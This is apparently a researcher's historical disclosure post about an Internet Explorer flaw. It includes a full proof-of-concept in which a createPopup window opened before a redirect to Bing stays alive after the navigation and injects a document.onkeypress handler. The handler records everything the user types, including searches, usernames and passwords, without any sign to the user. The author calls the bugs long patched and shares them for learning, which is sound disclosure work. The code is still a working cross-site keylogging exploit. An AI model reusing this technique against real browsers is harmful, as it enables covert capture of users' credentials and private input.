Building on the earlier resident-popup findings, I put together a demonstration showing that a createPopup created before a redirect can capture keystrokes typed into the redirected page. The popup stays visible, injects a document.onkeypress handler, and reports everything the user types — searches, usernames, or passwords — without any indication that anything unusual is happening.
<script language="JavaScript">
function main()
{
var win = window.open("redir.aspx");
var cp = win.createPopup();
cp.document.bgColor = "blue";
cp.document.body.innerHTML = '<div style="font-family:Arial;font-size:12px;color:#ffffff;"> Wow! We are at Bing but we are still alive and kicking!<br /><br />' +
' <b>Check out how we capture every keystroke.</b>' +
' Go ahead, start typing inside Bing\'s search-box and see it in action.<br /><br />' +
' We can capture searches, usernames, passwords, etc, etc.<br /><br />' +
' <span style="font-size:12px;color:red;font-weight: bold;" id="typedText"> </span><br />' +
'</div>' +
'<script defer="defer">' +
' document.onkeypress = function(){' +
' document.all.typedText.innerText += String.fromCharCode(event.keyCode);' +
' }' +
'<\/script>';
cp.show(200, 0, 700, 120);
}
</script>
<input type="button" size="50" onclick="main()" value="Open new window and show createPopup()">The redir.aspx redirects to Bing. The popup is created and shown before the redirect completes, with a defer-tagged script that sets up a keypress handler. Because the popup survives the navigation, its onkeypress fires on every key the user types, regardless of which input field they are focused on within the Bing page.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.